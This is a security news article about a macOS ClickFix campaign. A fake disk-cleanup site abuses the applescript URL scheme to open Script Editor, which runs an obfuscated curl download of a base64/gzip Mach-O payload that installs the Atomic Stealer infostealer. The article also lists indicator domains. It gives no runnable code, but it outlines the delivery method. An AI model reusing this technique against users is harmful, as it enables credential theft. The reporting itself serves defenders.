A recent cyber campaign targeting macOS systems has emerged, utilizing the Script Editor to deploy the Atomic Stealer infostealer, circumventing traditional Terminal-based defenses. This shift highlights attackers’ adaptability to Apple’s strengthened security measures, underscoring the persistent threat of social engineering.
Exploiting Apple’s Security Enhancements
Historically, ClickFix attacks have misled users into executing malicious commands via Terminal, disguised as routine maintenance. Apple’s response with macOS 26.4 included a feature to scrutinize pasted commands in Terminal, complicating this method. However, attackers have now redirected their efforts to the Script Editor, a macOS tool known for its automation capabilities and prior misuse in malware distribution.
Security experts at Jamf Threat Labs detected this new method through behavioral analysis, flagging Script Editor’s unexpected usage as suspicious. This discovery illustrates the rapid adaptation of threat actors when faced with new security controls, as they leveraged the applescript URL scheme to initiate Script Editor from a web browser, evading recent Terminal defenses.
Deceptive Web Pages and User Manipulation
The attack journey begins with a deceptive Apple-themed website, masquerading as a disk space management tool, offering guidance that mimics legitimate macOS procedures. Upon clicking the Execute button, users unknowingly activate the applescript URL scheme, prompting their browser to request permission to open Script Editor, making the malicious activity appear routine.
Once accessed, Script Editor presents a script falsely claiming to enhance Apple storage, enhancing its credibility. The macOS 26.4 update requires users to save this script before execution, adding a layer of user interaction.
Payload Execution and Security Recommendations
Execution of the script initiates an attack chain where obfuscated commands transform strings into URLs, utilizing the curl command to bypass TLS validation, allowing malware to communicate with suspicious networks. The payload, encoded in base64 and compressed with gzip, is decoded into a Mach-O binary, which is then executed, deploying the Atomic Stealer on the system.
Known indicators of compromise include domains like dryvecar.com and storage-fixes.squarespace.com, associated with fraudulent ClickFix websites. Users should exercise caution, avoiding scripts from unfamiliar web pages, and deny browser requests to open Script Editor. Keeping macOS updated ensures the latest security measures are in place to counteract such threats.
For ongoing updates and security advice, follow us on Google News, LinkedIn, and X. Set CSN as a preferred source on Google to stay informed.
